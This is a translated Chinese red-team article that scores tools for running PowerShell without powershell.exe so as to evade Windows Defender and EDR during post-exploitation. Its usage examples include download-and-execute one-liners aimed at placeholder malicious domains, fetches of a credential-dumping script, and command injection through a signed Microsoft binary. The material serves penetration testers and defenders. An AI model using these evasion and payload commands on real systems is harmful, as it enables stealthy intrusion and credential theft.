无 PowerShell.exe 运行 PowerShell 脚本的几种方法

李白 内网渗透 2019年11月28日发布
Favorite收藏

导语:本文将概述在不使用 powershell.exe 的情况下运行 powershell 脚本和命令的最佳工具。

本文将概述在不使用 powershell.exe 的情况下运行 powershell 脚本和命令的最佳工具。

在过去的几个月里,我通过观察攻击者以及随之而来的杀毒软件的移动情况后,我打算写这篇文章给所有的渗透测试人员和红队成员,他们正在寻找在后漏洞利用阶段使用 PowerShell 脚本或命令行的最佳技术,而不需要运行 PowerShell.exe,从而避免被下一代杀毒软件、 EDR 或蓝队或威胁追踪团队捕获。

在网上,我花了一些时间尝试和分析适合这个目的的不同工具。 对于每一个工具,我都给出了我个人的评分。 请让我知道你的想法以及你的经验或其他与文本提到的类似的工具。 下面是本文中测试的工具列表:

· PowerLine 得分: 9

· NPS — Not PowerShell 得分: 4

· PowerShdll 得分: 7

· PowerLessShell 得分: 5

· Nopowershell 得分: 6

· SyncAppvPublishingServer 得分: 7

工具分析

PowerLine

Brian Fehrman (@fullmetalcache)创建的非常好的实用程序,可以直接调用 PowerShell 脚本而不需要调用 PowerShell 程序。 这个工具是用 C# 编写的,可以完全通过命令行使用,包括远程使用。 简而言之,你可以使用已经存在的 PowerShell 脚本,而无需使用 PowerShell.exe PowerLine 的主要特点有:

· 易于部署和构建——不需要 Visual Studio

· 能够自动检测 Win7 Win10系统

· 能够作为 PowerShell 终端使用

· 能够通过 XML 设置指定要包含的远程脚本(脚本保留在内存中)

· 能够在每次构建中生成并用于异或(XOR 脚本的随机字节

下面是使用详情:

一旦在计算机上实现了远程代码执行,获得一个令人满意的后漏洞利用是非常重要的。 运行一系列 PowerShell 工具来促进这项工作是很有意思的,比如: Meterpreter Mimikatz PowerView PowerUp Inveigh 等等。

为了方便起见,下面的截图是我从 PowerShell 中截取的。 同样的命令可以直接从 CMD 启动,从而完全避免在首次编译阶段也使用 PS

部署

部署非常简单且模块化。 要拥有一个功能版本的 PowerLine,必须遵循以下步骤:

· 下载代码储存库:https://github.com/fullmetalcache/PowerLine

· 运行 build.bat 文件

1.png

build.bat 运行后的输出内容

· 更新 UserConf.xml 使其包含你想要包含的脚本的 URL

2.png

包含自定义的 Mimikatz ps1 脚本的 UserConf.xml 文件

· 运行 PLBuilder.exe 文件

3.png

· 现在 PowerLine.exe就会创建程序,并包含你指定的所有脚本,这些脚本会经过嵌入、 xor 编码、 base64编码处理。

执行:

如果所有部署步骤都成功,则应该将 PowerLine.exe 可执行文件发送给受害者。 可以使用 certutil 从远程主机获取可执行文件。 如果你直接在受害者机器上下载原始 Github 代码库,你可以使用本地 PowerLine.exe 文件。 下面是示例用法:

4.png

显示所有已导入的脚本

5.png

通过 PowerLine.exe 调用 PowerUp 工具

目前,这个工具在编译阶段能够绕过更新到最新版本 1903 Windows 10 中的 Windows Defender 显然,根据正在加载的脚本,这个方法有可能逃避防病毒检测。 Mimikatz 为例,由于我加载了一个基本版本,所以会被 Windows Defender 阻止掉,但是对于其他常见的恶意脚本,则可以成功绕过。 例如,导入 WCMDump Ps1 脚本,就可以在不使用 Powershell.exe 的情况下绕过 Windows Defender ,从而运行脚本:

没有 PowerLine 的标准恶意命令行:

6.png

尝试下载并在内存中执行脚本

7.png

将脚本下载到本地并运行,但 Defender 会阻止脚本运行

8.png

来自 Windows Defender 的检测提示

使用 PowerLine 绕过 Windows Defender:

9.png

该脚本被正确导入并在不触发杀软的情况下运行

考虑因素:

PowerLine 看起来似乎是一个很好的工具,可以绕过杀软 EDR,后者实际上会过度控制 PowerShell 启动的恶意命令行。 Windows 进程树中,命令行由 PowerLine.exe 进程执行。 显然,这个工具和相关检测依赖于加载的脚本。 如果 AV EDR 检查脚本的行为,而不是启动脚本的进程,那么对于蓝队来说可能会有额外的检测。 这个工具的一个缺点是,每次你想加载一个新的脚本时,你必须把它添加到配置文件中,这可能会减缓后漏洞利用活动,但这取决于你在渗透测试活动中有多少时间。 你还可以在启动攻击之前创建一个自定义版本,其中包含你需要的所有脚本。简而言之,PowerLine对于后漏洞利用中的规避是非常有用的,但是它的扩展性和速度都不是很快。这个工具绕过反病毒检测的真正附加值是脚本编码。

得分: 9

官方链接: Github Repo . Video . Slides

NPS —— Not PowerShell

这个工具的所有版本目前都可以被标准的 Windows Defender 检测到,因此我们把它放到了顶级工具列表中。 因为我们知道有很多红队成员有很强的抑制或绕过杀毒的能力,所以我们尝试使用同样的工具,但是至少在下载阶段就会被 Windows Defender 阻止掉。 显然,总是有可能下载完整的代码库,并编译自己的自定义版本,可能不会被 AV 检测到。

下面是使用命令:

cmdline:
 nps.exe "{powershell single command}"
 nps.exe "& {commands; semi-colon; separated}"
 nps.exe -encodedcommand {base64_encoded_command}
 nps.exe -encode "commands to encode to base64"
 nps.exe -decode {base64_encoded_command}

我尝试编码一个恶意的脚本并运行。 很明显,这是因为 Windows Defender 没有运行。 一旦你重新激活  Windows Defender,它会立即检测出可执行文件是恶意的并将其消除。 查看 Windows 进程树可以注意到,启动 powershell 命令的唯一进程总是 nps.exe,而 powershell 可执行文件从未被调用,但它们的检测率是相同的。

考虑因素:

这个工具可以在特别不安全的环境中考虑使用,在这种环境中,红队希望较少的留下恶意的“ powershell”命令行的痕迹。 在所有其他情况下,使用这个工具会被杀软检测到,所以你的努力将是无用的。

得分: 4

链接https://github.com/Ben0xA/nps

PowerShdll

此工具只允许使用 dll 运行 PowerShell。这个工具之所以不需要访问 powershell.exe,是因为它使用 powershell 自动化 dll 可以使用以下命令运行 PowerShdll: rundll32.exe installutil.exe regsvcs.exe regasm.exe regsvr32.exe 或作为独立的可执行文件运行。

用法示例:

Rundll32 Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h Display this message
rundll32 PowerShdll,main -f <path> Run the script passed as argument
rundll32 PowerShdll,main -w Start an interactive console in a new window
rundll32 PowerShdll,main -i Start an interactive console in this consoleExe Usage:
PowerShdll.exe <script>
PowerShdll.exe -h Display this message
PowerShdll.exe -f <path> Run the script passed as argument
PowerShdll.exe -i Start an interactive console in this consoleRun base64 encoded script:
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iexDownload and run script
rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

真实场景中 exe 的使用示例:

10.png

运行标准 Mimikatz 工具或者其他凭证转储工具,如 WCMDumpWindows Defender 可以阻止这两种情况下的恶意行为(exe dll 使用) 我也尝试过先下载 ps1,但是在这种情况下,Windows Defender 有这些脚本的签名,所以它会像阻止恶意的 ps1 脚本的标准下载行为一样删除这些脚本。

11.png12.png13.png

注意: 当你打开交互式控制台时,你可以输入的最大字符数并不多。 例如,如果你需要启动一个非常长的编码命令或者一行反向 shell 命令,那么使用这个工具是不可能的完成的:

14.png

考虑因素:

这个工具有一些有趣的特性,可以直接与 rundll32一起使用,这样可以避免某些杀软的检测,并避免使用已知哈希编译可执行文件。 标准的恶意行为会被检测到,但是删除和执行行为在 Windows Defender 中不会被检测到,这就把我们带到了下一个阶段这个阶段允许我们运行脚本而不需要调用 powershell.exe 这正是我们需要的。 在红队的渗透测试中,直观和简单可能是一个最佳的解决方案,但恶意行为仍然是由反病毒软件检测。

得分: 7

链接https://github.com/p3nt4/PowerShdll

PowerLessShell

PowerLessShell 依靠 MSBuild.exe 远程执行 PowerShell 脚本和命令,而无需生成 PowerShell.exe 你也可以使用相同的方法执行原始 shell 代码。

如果你试图通过 PowerLessShell 运行 WMCDump ps1脚本,这会被 Windows Defender 阻止。 以下是所有的细节:

15.png

Kali 中用于创建有效载荷代码的 PowerLessShell

16.png

生成的恶意有效载荷的代码执行

对于一个简单的反向 shell 也是如此:

17.png

试着打开一个反向 shell

考虑因素:

目前这个工具不方便使用,因为所有有效载荷必须在攻击者的机器上创建和复制,甚至最简单的有效载荷都会被检测到。 这意味着没有真正的代码混淆或规避方法。 即使不是 PowerShell 直接运行的恶意 脚本也会被 Windows Defender 阻止。 此外,生成的 .bat 文件在运行阶段经常失败。

得分: 5

链接: https://github.com/Mr-Un1k0d3r/PowerLessShell

Nopowershell

Nopowershell 是用 C# 实现的工具,它支持执行类似于 PowerShell 的命令,同时对于任何 PowerShell 日志机制都不会产生日志。 使用 NoPowerShell 的理由如下:

· 执行过程相当隐秘

· 强大的功能

· 支持你在 PowerShell 中已经熟悉的 cmdlet,因此无需再学习其他工具

· 如果你对 PowerShell 不是很熟悉,你也可以使用 cmd.exe 别名 (例如: ping 取代 Test-NetConnection)

· powerpick powershell cmdlet nps 中不可以使用。 (例如:来活动目录模块的 cmdlet)

· 只需要几行 C# 就可以很容易地扩展

支持的命令:

18.png

下面是对可执行文件的一些测试:

19.png

下面是一些通过 dll 运行 NoPowerShell 的测试:

20.png

交互式控制台也存在 PowerShdll 的相同问题。 目前输入的字符长度限制在 120 个字符。 这个工具与 PowerShdll 几乎完全相同。 它具有嵌入的特性,允许你轻松地启动命令,而无需详细了解所有 PowerShell 函数。 但是,它似乎不能像 PowerShdll 那样直接从命令行运行 ps1脚本。

考虑因素:

这个工具的注意事项与 PowerShdll 的注意事项类似。对于启动 powershell 命令,而不产生 powershell 进程来说非常有用,从而可以避免被 EDR 或威胁追踪识别到。 该工具的功能是直观且快速的。 在安全评估中使用起来很顺手,只需要花费很少的时间,而且没有恶意命令运行。 有限的功能和命令列表使它比其他工具的得分要少。

得分: 6

链接: https://github.com/bitsadmin/nopowershell

SyncAppvPublishingServer

Sync-appvpublishingservercmdlet 在当前用户的上 Sync-AppvPublishingServer cmdlet 用于启动微软应用程序虚拟化发布刷新操作(App-V)。这个工具在 Windows 上有两个版本:

· executable .exe  SyncAppvPublishingServer.exe

· VBScript  SyncAppvPublishingServer.vbs

这两个工具都可以在 Windows 10中的“ C:\Windows\System32”路径中找到,并且都是由微软签名的。

21.png

下面是一些测试命令行:

C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process Calc.exe ”
C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; iwr http://172.16.217.130:443"
C:\Windows\System32\SyncAppvPublishingServer.vbs; Start-Process calc
C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process cmd.exe '/c notepad.exe'"
C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1','$env:USERPROFILE/1.ps1'); Start-Process '$env:USERPROFILE/1.ps1' -WindowStyle Minimized;"
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1') | IEX"
C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('[MaliciousDomain]/Win.exe','$env:USERPROFILE/payload.exe'); Start-Process '$env:USERPROFILE/payload.exe' -WindowStyle Minimized;"
SyncAppvPublishingServer.vbs "n; ((New-Object Net.WebClient) .DownloadString ('http://malciousdomain/payload.ps1') | IEX '

Windows Defender 能够像检测 Powershell 一样从这些文件中检测出恶意命令行。 此外,当我试图运行一行启动反向 Shell 的,命令时, Windows Defender 可以检测到命令注入到 SyncApp 文件中。

22.png23.png

考虑因素:

这个工具支持命令行运行程序或字符串,但所有产生内部程序输出的内容,如 ipconfig whoami,在 cli 中没有回显,因此很难通过这个工具执行侦察阶段需要的 powershell 命令。 相反,如果你有一个恶意的 .ps1 脚本已经准备好在受害者机器上运行,比如在第一或第二阶段需要运行各种拥有恶意 powershell 脚本的银行木马时则会很有用。 在这种情况下,你可以避免在 EDR 进程树中或入侵检测中因为使用 Powershell 而被检测的。 然而,这个工具仍然像 Powershell 一样受到杀软的严密监控。

得分: 7

链接: Microsoft . Ired.team . Detailed_blog . Twitter . Poc_video

结论

通过分析我能找到的所有开源工具,我可以说目前最好的的工具是 PowerLine,我的个人评分是9或者10 这个工具使用起来有点复杂,但是只要有良好的准备和正确的脚本,就可以绕过反病毒程序的检测,静默地执行各种后漏洞利用的步骤。 然而,根据特定的需求,你也可以使用其他更快速和用户友好的工具。 如果你需要在不使用 Powershell.exe 的情况下启动合法的侦察命令行,这些工具非常有用。 到目前为止,我还没有为我的红队找到完美的工具。 每个工具都有自己的长处和短处。

参考资料:

https://www.slideshare.net/dafthack/red-team-apocalypse-rvasec-edition

https://www.slideshare.net/dafthack/pwning-the-enterprise-with-powershell

https://www.slideshare.net/rahmatnf8/offensivepowershell-cheat-sheet

本文翻译自:https://medium.com/@Bank_Security/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628如若转载,请注明原文地址: https://www.4hou.com/system/21649.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论